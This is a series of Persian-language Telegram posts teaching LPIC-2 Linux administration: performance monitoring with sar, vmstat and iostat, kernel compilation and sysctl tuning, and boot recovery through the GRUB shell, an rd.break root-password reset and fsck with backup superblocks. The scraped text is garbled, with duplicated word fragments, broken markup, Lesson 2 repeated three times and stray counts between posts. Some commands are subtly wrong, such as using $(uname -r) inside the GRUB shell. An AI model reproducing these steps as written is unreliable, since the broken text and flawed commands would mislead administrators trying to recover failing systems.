LPIC‑2 | Lesson 3 ### درس ۳: احیای سیستم و عیب‌یابی بوت پیشرفته (System Startup Recovery) – بازگرداندن مُرده از گور! وقتی سرور اصلی دیتاسنتر بالا نمیاد، وقتی همه از ناامیدی سرشون رو می‌گیرن، اونجاست که تو، یک مهندس LPIC-2، وارد میدون می‌شی. اینجا دیگه خبری از reboot نیست؛ اینجا بحث بازگشت به زندگی در شرایط بحرانیه. #### ۱. ورود به دنیای GRUB2 Shell (غار اسرارآمیز بوت): اگه فایل grub.cfg خراب بشه، سیستم دیگه هیچی نمی‌فهمه. باید مثل یه هکر حرفه‌ای، بری تو GRUB Shell. * وقتی گراب بالا میاد، کلید c رو بزن. وارد محیط grub> می‌شی. * پیدا کردن بوت لودر: اول باید بدونی کرنل و initrd کجا هستن: grub> ls (لیست کردن دیسک‌ها و پارتیشن‌ها) grub> ls (hd0,1)/boot/ (شاید اینجا باشه!) * بوت دستی (Manual Boot): حالا که فهمیدی کرنل و initrd کجا پنهان شدن، دستی سیستم رو بوت کن: grub> set root=(hd0,1) (پارتیشن روت رو مشخص کن) grub> linux /boot/vmlinuz-$(uname -r) root=/dev/sda1 ro (آدرس کرنل و روت واقعی سیستم رو بده، ro یعنی Read-Only) grub> initrd /boot/initramfs-$(uname -r).img (آدرس initramfs رو بده) grub> boot (اگه همه چی درست بود، سیستم بالا میاد!) فاجعه: اگه بعد از بوت، سیستم بالا اومد و فهمیدی اشتباه کردی، قبل از اینکه بره تو حالت Read-Only، سریع rw (Read-Write) کن و گراب رو ترمیم کن. #### **۲. گریز از سیستم‌عامل با rd.break و systemd.unit=rescue.target:** دور زدن پسورد روت:ت:** فرض کن پسورد روت رو فراموش کردی، یا یکی خرابکاری کرده و پسورد رو عوض کرده. ری‌بوت کن، تو گراب خط linux رو پیدا کن، آخرش rd.break رو اضافه کن. ... ro crashkernel=auto rd.break حالا تو محیط initramfs هستی. اینجا روت (/) سیستم عامل شما نیست، بلکه یه محیط موقته. mount -o remount,rw /sysroot (فایل‌سیستم اصلی رو برای نوشتن مانت کن) chroot /sysroot (وارد محیط سیستم عامل اصلی شو) passwd root (پسورد روت رو عوض کن!) touch /.autorelabel (اگر SELinux فعاله، تا لیبل‌ها درست بشن) exit (از chroot خارج شو) exit (از initramfs خارج شو، سیستم ادامه بوت میده) * **Rescue Mode با systemd:** برای ورود به حداقل‌ترین حالت سیستم‌عامل (فقط سرویس‌های ضروری): ... ro crashkernel=auto systemd.unit=rescue.target اینجا می‌تونی با حداقل سرویس‌ها، مشکل رو ریشه‌یابی و حل کنی. #### **۳. بازگرداندن فایل‌سیستم از مرگ با fsck -b:** یکی از رایج‌ترین دلایل بالا نیامدن سرور، خراب شدن Superblock فایل‌سیستمه. Superblock مثل فهرست اصلی کتابه؛ اگه خراب بشه، سیستم دیگه نمی‌دونه فایل‌ها کجپیدا کردن سوپربلاک‌های پشتیبان:ی پشتیبان:** هر فایل‌سیستم ext کپی‌های پشتیبان از Superblock داره. این دستور آدرسشون رو بهت می‌ده: mke2fs -n /dev/sda1 (به جای sda1 پارتیشن مورد نظرت رو بزن) خروجی یه سری عدد بهت می‌ده (مثلاً 23456, 45678, ...). * **ترمیم با پشتیبان:** حالا با یکی از اون اعداد، فایل‌سیستم رو ترمیم کن: fsck -b 23456 /dev/sda1 این یعنی داری با یه کپی سالم از Superblock، دیسک مُرده رو به زندگی برمی‌گردونی! وقتی سیستمت می‌میره و تو با این دستورات جادویی، نفس رو بهش برمی‌گردونی، وقتی می‌تونی مثل یه جراح، قلب لینوکس رو در حال خونریزی ترمیم کنی، اونجاست که معنی واقعی LPIC-2 رو می‌فهمی. تو دیگه یه ادمناجی سیستمه **ناجی سیستم** هستی! ری‌اکشن‌ها رو بکوب تا بریم برای درس بعدی که قراره وارد قلمروی شبکه بشیم و با فایروال و پکت‌ها بازی کنیم! هزاران آموزش شبکه و امنیت (مخصوص حرفه‌ای‌ها و ناجیان سیستم): @Network_advanced #LPIC2 #BootRecovery #GRUB2 #Initramfs #Fsck #SystemRescue #HardcoreLinux #Troubleshooting
87
17
LPIC‑2 | Lesson 2 ### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم! اگه فکر می‌کنی با apt install و yum update لینوکس رو می‌شناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیش‌فرض گله دارن، خودش آستین بالا می‌زنه و کرنل رو دوباره می‌نویسه! این دیگه بازی بچه‌ها نیست، این نفوذ به عمیق‌ترین لایه‌های سیستم‌عامله. #### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking) اولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux. اونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig. * بازی با پرچم‌ها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو می‌خوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. می‌خوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکل‌های شبکه که کمتر استفاده میشن رو [M] می‌گیریم). * حذف ماژول‌های مُرده: می‌تونی درایورهای سخت‌افزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی! #### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast) حالا که انتخاب‌هات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی: make -j$(nproc) && make modules_install && make install * **راز $(nproc):** این دستور تعداد هسته‌های CPUت رو برمی‌گردونه. با -j داری به make می‌گیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریع‌ترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی. بعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار می‌گیره. ماژول‌ها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی. #### **۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning):** گاهی وقتا نمی‌تونی سرور رو ری‌بوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل می‌کافزایش سقف فایل‌های باز (File Descriptors):tors):** برای دیتابیس‌های بزرگ یا وب‌سرورهای پربازدید: echo "fs.file-max = 1000000" >> /etc/sysctl.conf sysctl -p (برای اعمال فواخطار:اخطار:** این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف می‌کفعال کردن IP Forwarding (برای روتر کردن سرور):سرور):** echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf sysctl -p * **کنترل سوآپ (Swappiness):** اگه سیستمت الکی میره تو سوآپ و کند می‌شه، می‌تونی swappiness رو کم کنی (بین ۰ تا ۱۰۰، پیش‌فرض ۶۰): echo "vm.swappiness = 10" >> /etc/sysctl.conf sysctl -p **نتیجه:** هرچی swappiness کمتر، هسته دیرتر سراغ فضای سوآپ میره و بیشتر سعی می‌کنه از RAM استفاده کنه. وقتی هسته رو طوری تنظیم می‌کنی که ذره‌ای از منابع سیستمت هدر نره، وقتی می‌تونی در حال پرواز (Live) تنظیماتش رو دستکاری کنی، اونجاست که دیگه فقط یه ادمجادوگر سیستم**جادوگر سیستم** شدی! این یعنی قدرت بی‌حد و حصر. ری‌اکشن‌ها رو بکوب تا بریم سراغ درس ۳ که قراره با بوت لودرها کشتی بگیریم و از دل خاکستر، سیستم رو زنده کنیم! هزاران آموزش شبکه و امنیت (مخصوص حرفه‌ای‌ها): @Network_advanced #LPIC2 #Kernel #LinuxKernel #Sysctl #Compilation #AdvancedLinux #HardcoreLinux #SystemHacking
85
18
LPIC‑2 | Lesson 2 ### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم! اگه فکر می‌کنی با apt install و yum update لینوکس رو می‌شناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیش‌فرض گله دارن، خودش آستین بالا می‌زنه و کرنل رو دوباره می‌نویسه! این دیگه بازی بچه‌ها نیست، این نفوذ به عمیق‌ترین لایه‌های سیستم‌عامله. #### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking) اولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux. اونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig. * بازی با پرچم‌ها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو می‌خوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. می‌خوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکل‌های شبکه که کمتر استفاده میشن رو [M] می‌گیریم). * حذف ماژول‌های مُرده: می‌تونی درایورهای سخت‌افزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی! #### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast) حالا که انتخاب‌هات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی: make -j$(nproc) && make modules_install && make install * راز $(nproc): این دستور تعداد هسته‌های CPUت رو برمی‌گردونه. با -j داری به make می‌گیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریع‌ترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی. بعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار می‌گیره. ماژول‌ها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی. #### ۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning): گاهی وقتا نمی‌تونی سرور رو ری‌بوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل می‌کافزایش سقف فایل‌های باز (File Descriptors):tors):** برای دیتابیس‌های بزرگ یا وب‌سرورهای پربازدید: echo "fs.file-max = 1000000" >> /etc/sysctl.conf sysctl -p (برای اعمال فواخطار:اخطار: این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف می‌کفعال کردن IP Forwarding (برای روتر کردن سرور):سرور): echo…
1
19
LPIC‑2 | Lesson 2 درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management)**، این بار با چاشنی وحشی‌گری بیشتر و جزئیات دقیق، آماده برای تلگرام. --- ### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم! اگه فکر می‌کنی با apt install و yum update لینوکس رو می‌شناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیش‌فرض گله دارن، خودش آستین بالا می‌زنه و کرنل رو دوباره می‌نویسه! این دیگه بازی بچه‌ها نیست، این نفوذ به عمیق‌ترین لایه‌های سیستم‌عامله. #### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking) اولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux. اونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig. * بازی با پرچم‌ها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو می‌خوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. می‌خوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکل‌های شبکه که کمتر استفاده میشن رو [M] می‌گیریم). * حذف ماژول‌های مُرده: می‌تونی درایورهای سخت‌افزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی! #### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast) حالا که انتخاب‌هات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی: make -j$(nproc) && make modules_install && make install * **راز $(nproc):** این دستور تعداد هسته‌های CPUت رو برمی‌گردونه. با -j داری به make می‌گیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریع‌ترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی. بعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار می‌گیره. ماژول‌ها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی. #### **۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning):** گاهی وقتا نمی‌تونی سرور رو ری‌بوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل می‌کافزایش سقف فایل‌های باز (File Descriptors):tors):** برای دیتابیس‌های بزرگ یا وب‌سرورهای پربازدید: echo "fs.file-max = 1000000" >> /etc/sysctl.conf sysctl -p (برای اعمال فواخطار:اخطار:** این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف می‌کفعال کردن IP Forwarding (برای روتر کردن سرور):سرور):** echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf sysctl -p * **کنترل سوآپ (Swappiness):** اگه سیستمت الکی میره تو سوآپ و کند می‌شه، می‌تونی swappiness رو کم کنی (بین ۰ تا ۱۰۰، پیش‌فرض ۶۰): echo "vm.swappiness = 10" >> /etc/sysctl.conf sysctl -p **نتیجه:** هرچی swappiness کمتر، هسته دیرتر سراغ فضای سوآپ میره و بیشتر سعی می‌کنه از RAM استفاده کنه. وقتی هسته رو طوری تنظیم می‌کنی که ذره‌ای از منابع سیستمت هدر نره، وقتی می‌تونی در حال پرواز (Live) تنظیماتش رو دستکاری کنی، اونجاست که دیگه فقط یه ادمجادوگر سیستم**جادوگر سیستم** شدی! این یعنی قدرت بی‌حد و حصر. ری‌اکشن‌ها رو بکوب تا بریم سراغ درس ۳ که قراره با بوت لودرها کشتی بگیریم و از دل خاکستر، سیستم رو زنده کنیم! هزاران آموزش شبکه و امنیت (مخصوص حرفه‌ای‌ها): @Network_advanced #LPIC2 #Kernel #LinuxKernel #Sysctl #Compilation #AdvancedLinux #HardcoreLinux #SystemHacking
1
20
LPIC‑2 | Lesson 1 از اینجا به بعد دیگه بازی با دستورات ls و cd تموم شد. وارد دنیایی می‌شیم که درایورها و وقفه‌های سخت‌افزاری (Interrupts) باید جلوی تو لنگ بندازن. اینجا LPIC-2 هست؛ جایی که ما لینوکس رو نمی‌رونیم، ما لینوکس رو کالبدشکافی می‌کنیم. از درس ۱ شروع می‌کنیم، اما با غلظتی که مغزت بوی سیلیکون سوخته بده. --- ### درس ۱: پایش سیستم و پیش‌بینی ظرفیت (Capacity Planning) در سطح جانی! یک ادمین معمولی وقتی سرور کند می‌شه top می‌زنه و نگاه می‌کنه. یک مهندس LPIC-2 مثل تو، باید بتونه قبل از اینکه کاربر حتی بفهمه سرور قراره کند بشه، گلوگاه (Bottleneck) رو پیدا و خفه کنه. #### **۱. کالبدشکافی با sar (System Activity Reporter):** ابزار sar عصای دست توئه. این ابزار داده‌ها رو از /proc می‌کشه و در فایل‌های باینری در /var/log/sa/ ذخیره می‌کنه. تحلیل حافظه در گذشته:ه:** فرض کن دیشب ساعت ۳ صبح سرور کرش کرده. با این دستور برگرد به عقب: sar -r -f /var/log/sa/sa$(date +%d -d "yesterday") اینجا دنبال ستون %commit بگرد. اگه این عدد از ۱۰۰ بالاتر رفته، یعنی سیستم بیش از حدِ توانِ واقعیش (RAM + Swap) به پروسس‌ها وعده فضا داده و دیشب "OOM Killer" اومده و پروسس‌ها رو سلاخی کرده. #### **۲. شکارچی گلوگاه: vmstat و وقایع پشت پرده:** اجرای vmstat 1 فقط چند تا عدد نیست، ضربان قلب سیستمه. * **ستون cs (Context Switches):** اگه این عدد به طور ناگهانی بالا بره (مثلاً بالای ۱۰۰ هزار)، یعنی CPU داره دیوونه می‌شه چون مدام مجبور ه بین پروسس‌های مختلف سوئیچ کنه و عملاً هیچ کار مفیدی انجام نمی‌ده. * **ستون in (Interrupts):** بالا بودن این عدد یعنی یه قطعه سخت‌افزاری (مثل کارت شبکه زیر حمله DDoS یا یه دیسک خراب) داره مدام به CPU سیگنال می‌فرسته و وقتش رو تل۳. شکنجه دیسک با iostat:یسک با iostat:** وقتی دیسک کند می‌شه، سیستم فلج می‌شه. این دستور رو بزن: iostat -xz 1. * **ستون await:** این حیاتی‌ترین عدده. یعنی میانگین زمانی (به میلی‌ثانیه) که یک درخواست I/O منتظر می‌مونه تا انجام بشه. اگه این عدد بالای ۱۰-۱۵ میلی‌ثانیه بره، دیسک‌های تو داستون %util: * **ستون %util:** اگه این ۱۰۰٪ باشه یعنی دیسک بندری می‌زنه و دیگه هیچ پهنای باندی نداری. وقتشه RAID رو ارتقا بدی یا ب۴. پیش‌بینی ظرفیت (The Engineering Art): Engineering Art):** مهندس واقعی با حدس و گمان کار Linear Regression*Linear Regression** استفاده کنی. * فایل‌های sa رو به متن تبدیل کن: sadf -d /var/log/sa/saXX -- -r > mem_usage.csv. * این داده‌ها رو توی اکسل یا با یه اسکریپت پایتون تحلیل کن. اگه نرخ رشد مصرف RAM ماهانه ۵٪ باشه و تو الان ۲۰٪ فضای خالی داری، یعنی دقیقاً ۴ ماه دیگه سرورِ تو می‌ترکه. این یعنی Capac۵. ابزارهای مدرن‌تر: ابزارهای مدرن‌تر:** یادت باشه collectd و Prometheus هم هستن، اما در امتحان LPIC-2 و در شرایطی که شبکه قطعه، تو فقط خودتی و sysstat. پس باید بتونی با sadc و sa1/sa2 دستی آمار جمع کنی. اگه فکر کردی ادمین بودن یعنی فقط نصب کردن پکیج، اشتباه کردی. ادمین لینوکس یعنی جراحِ ثانیه‌ها و بایت‌ها. وقتی بقیه دارن تو تاریکی دنبال مشکل می‌گردن، تو با تحلیل sar نور می‌تابونی به قلب سیستم. ری‌اکشن رو بترکون تا بریم سراغ درس ۲ که قراره هسته لینوکس رو تیکه پاره کنیم! هزاران آموزش شبکه و امنیت (مخصوص حرفه‌ای‌ها): @Network_advanced #LPIC2 #SysAdmin #PerformanceTuning #CapacityPlanning #LinuxEngineering #Monitoring #HardcoreLinux
131